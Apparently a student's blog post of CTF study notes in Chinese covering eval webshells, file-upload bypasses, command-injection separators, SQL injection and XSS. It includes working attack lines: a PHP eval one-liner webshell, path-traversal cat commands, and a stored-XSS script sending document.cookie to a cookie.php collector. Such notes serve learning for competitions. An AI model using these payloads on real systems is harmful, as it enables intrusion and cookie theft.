补充

1、题目:描述:http://115.239.217.94:16695/ 考察选手对于eval木马、ls、cat命令的运用

解法:输入http://115.239.217.94:16695,出现@eval($_GET['xszx,然后http://115.239.217.94:16695/?xszx=system('ls'); ,然后输入http://115.239.217.94:16695/?xszx=system('ls …/…/…/…/…/…/…/…/…/…/…/…/'); 找到flag,之后输入http://115.239.217.94:16695/?xszx=system('cat …/…/…/…/…/…/…/…/…/…/…/…/flag'); 

ls找东西(查看当前目录下的文件)⇔dir

cat拿东西

 …/回溯上一级目录

   /   下一级目录

?前面是文件,作用传参

2、补充:看ip是http://115.239.217.94:16695/?xszx=system('if'); 

 图片:先下载下来,

扫端口:目录端口后台主机发现,router扫描端口,ip

Moba…,new  sen,远程主机填域名,用户名root,比赛填真实端口(端口填的比真实端口多1,eg.真实是18896填18897),路径var/www/html,所有文件选定右键下载,D盾,所有文件拖到里面,删除

http://115.239.217.94:7991/main

php标签外是文件

3、文件上传:

先随便上传一个php文件,之后将上传的文件底下的图片拖到浏览器得到地址,中国菜刀,右键添加,SHELL木马地址,密码是GET或POST框内的东西,然后双击出现的东西,新建文档并命名后缀为php,在文档中编辑木马eg.<?php @eval[$_POST[cmd]);?>   ,然后转为jpg文件上传,在上传同时抓包,将抓到的东西改为php,之后Forward。

补充:(传输前是前端校验,传输后是后端校验,抓包工具抓包时绕过了前端校验。图片码:图片中带的码,打开图片源代码,在其中加木马。

注:和php同等的有phptml、php3、php5,也可以用大小写混淆;

window三大特性:文本后缀名不能有空格、           “.”         、          “::$DATA"(数据流)

若上传文件后php被删除,则在抓到的包中改为pphphp;

文件包含绕过:115.239.217.94:1314/uploado/include.php?file uploads/3820240221201209.jpeg

load_file读取计算机内的文件

了解:%00截断、竞争条件绕过、.htaccess绕过、.user.ini绕过、二次渲染绕过

补充:自己写木马需要加上GIF89a

4、机器人协议:一个网站中有robots.txt,文件中有哪个可以爬,哪个不可以爬

5、SQL注入:“--+”表示注释

查看文件用type

补充:sql注入时间盲注

7、rce命令执行

  • 分号:127.0.0.1;ls  执行完前面的命令后,又执行了后面一条命令,当前面的命令错误时,执行后面的命令
  • |: ping 127.0.0.1|ls   不执行前面命令,只执行后面命令
  • ||:ping 127.0.0.1||ls当前面的执行结果错误时,后面命令才会执行,当前面的命令正确时,后面不执行
  • &:ping 127.0.0.1&ls执行完前面的命令后,又执行了后面一条命令,当前面的命令错误时,执行后面的命令
  • &&:ping 127.0.0.1&&ls   前后都执行,若前面错,则后面不执行

 8、如果输入的代码中POST被注释,则输入“   /POST   ”

9、eval代码执行

system,shell_exec命令执行

whoami查看当前有效用户命令

calc计算器

shutdown关机

10、进入后台admin.php

 11、xss:先找有没有可以输入的地方,之后输入<script>alert('1')</script>,若没有弹窗,则把源代码语句闭合。

<script>document.location="网址"<script>表示要跳转的网站

存储型xss:<script>document.location="http://127.0.0.1/cookie.php?cookie="+document.cookie;</script>

12、Pwn:打开nc64.exe 网址(空格)端口

cat flag

13、逆向:打开IDA,Shift+f12查看字符串  复制map的字符串,然后新建文档将字符串放到里面

14、Ctrl+u/网页前加view-source观看源代码

15、查询是否有SQL注入:inurl:php?id=1

三、

信息收集:eg.  http://www.beidu.com     其中beidu.com是主域名,www是子域名,也是二级域名

四、对象序列化

序列化函数:serialize(变量)

eg.<?php

$a='test';
echo '序列化:';
$b=serialize($a);
print_r($b);
?>

 输出:序列化s:4:test(其中s表示string,4表示长度,o表示类,a表示数组)

eval在php中是一个执行代码命令的高危函数

posted @ 2024-02-20 22:31  小梨漫  阅读(56)  评论(0)    收藏  举报